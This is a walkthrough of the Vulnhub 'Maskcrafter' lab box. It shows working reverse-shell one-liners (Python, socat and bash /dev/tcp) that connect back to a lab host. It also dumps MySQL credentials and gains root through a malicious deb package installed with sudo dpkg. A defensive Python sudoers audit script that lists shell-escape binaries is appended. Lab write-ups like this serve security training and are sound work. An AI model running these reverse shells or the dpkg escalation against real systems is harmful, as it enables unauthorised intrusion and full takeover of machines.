Vulnhub – Maskcrafter Walkthrough

Scanning the box with nmap -A -T4 -p- 192.168.1.18 -vv

We can see an FTP port that's open for anonymous login, so let's try it:

OK, the file NOTES.txt says that using admin as the login is a bad idea:

So we're going to try admin:admin as our login on the page http://192.168.1.18/debug/

And we're in. Let's select the options one by one and see what we get:

ifconfig displayed the IP address and so on, and id gave us:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

uname gave us:

Linux maskcrafter 4.15.0-91-generic #92-Ubuntu SMP Fri Feb 28 11:09:48 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

Now we can use Burp Suite to push a reverse shell to the target using:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.11",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

In the /var/www/html path there is a file db.php where we can see a password and that a local database is running.

Now we log in to MySQL using mysql -u web -p and then enter the password P@ssw0rdweb

show databases;

use mydatabase;

show tables;

select * from creds;

select * from login;

Then we use cred12345!! to decrypt the file cred.zip, which we downloaded earlier from the FTP server:

It's a password for the user userx, so let's log in with SSH:

OK, edit the file whatsmyid.sh with nano and run it like this: sudo -u evdaez ./whatsmyid.sh

Let's see the sudo privileges for the new user evdaez:

OK, now we're going to escalate our privileges with socat. Let's start a listener on our machine using this command:

socat file:`tty`,raw,echo=0 tcp-listen:444

And on the target machine use this:

sudo -u researcherx /usr/bin/socat TCP4:192.168.1.11:444 EXEC:bash,pty,stderr,setsid,sigint,sane

Now, to be clear, this part is a real headache, so follow my steps and use this link too: https://gtfobins.github.io/gtfobins/dpkg/ or it won't work. This is the result of a lot of trial and error:

First download this from GitHub: https://github.com/jordansissel/fpm and install it as:

gem install fpm from inside the folder.

apt install rpm

Then create a tiny reverse shell:

#!/bin/bash

bash -i >& /dev/tcp/192.168.1.11/3333 0>&1

And save it as root.sh

Then run these commands in order:

TF=$(mktemp -d)

echo 'exec /bin/sh' > $TF/root.sh

fpm -n x -s dir -t deb -a all --before-install $TF/root.sh $TF

You will get this message: Created package {:path=>"x_1.0_all.deb"}

Now use wget to transfer the file x_1.0_all.deb to the target machine

And run it as sudo dpkg -i x_1.0_all.deb

And finally we are root!!!
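The whole chain above (userx to evdaez to researcherx to root) rests on three sudo rules: one that runs a script the caller can edit, and two that hand out socat and dpkg, both of which GTFOBins lists as shell escapes. The script below is an added audit example, not part of the original walkthrough or the box, that parses sudoers-style rules and flags exactly those patterns; the sample sudoers text and the /home/userx/whatsmyid.sh path are constructed for the example, since the box's real file is not shown on this page.

```python
import os
import re

# Binaries GTFOBins documents as sudo shell escapes: the two from this walkthrough plus common ones.
SHELL_ESCAPES = {"dpkg", "socat", "vim", "vi", "find", "python", "python3", "perl", "env", "less", "bash", "sh"}
SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/local/bin/", "/usr/local/sbin/")

# user host = (runas[:group]) [TAG:...] cmd[, cmd...]
SUDOERS_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
                        r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def parse_sudoers_line(line):
    """Parse one user specification; None for blanks, comments and Defaults lines."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith("Defaults"):
        return None
    m = SUDOERS_RE.match(line)
    if not m:
        return None
    runas = (m.group("runas") or "ALL").split(":")[0].strip() or "ALL"
    return {"user": m.group("user"), "runas": runas,
            "nopasswd": "NOPASSWD:" in m.group("tags"),
            "commands": [c.strip() for c in m.group("cmds").split(",") if c.strip()]}

def audit_sudoers(text):
    """Return (user, runas, command, reason) for every rule a reviewer should look at."""
    findings = []
    for raw in text.splitlines():
        spec = parse_sudoers_line(raw)
        if spec is None:
            continue
        for cmd in spec["commands"]:
            exe = cmd.split()[0]
            if exe == "ALL":
                reason = "ALL commands permitted"
            elif os.path.basename(exe) in SHELL_ESCAPES:
                reason = "GTFOBins shell-escape binary"
            elif not exe.startswith(SYSTEM_DIRS):
                reason = "command outside system directories; check who can write it"
            else:
                continue  # a specific, non-escapable system binary: nothing to flag here
            findings.append((spec["user"], spec["runas"], cmd, reason))
    return findings

# Constructed sample mirroring the sudo chain in this walkthrough (not the box's real sudoers).
SAMPLE_SUDOERS = """\
root ALL=(ALL:ALL) ALL
userx ALL=(evdaez) NOPASSWD: /home/userx/whatsmyid.sh
evdaez ALL=(researcherx) NOPASSWD: /usr/bin/socat
researcherx ALL=(root) NOPASSWD: /usr/bin/dpkg
"""
```

Run audit_sudoers over the output of visudo -c -f or sudo -l on a host you administer; the "outside system directories" finding is the cue to check file ownership and mode, which this offline parser cannot do.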
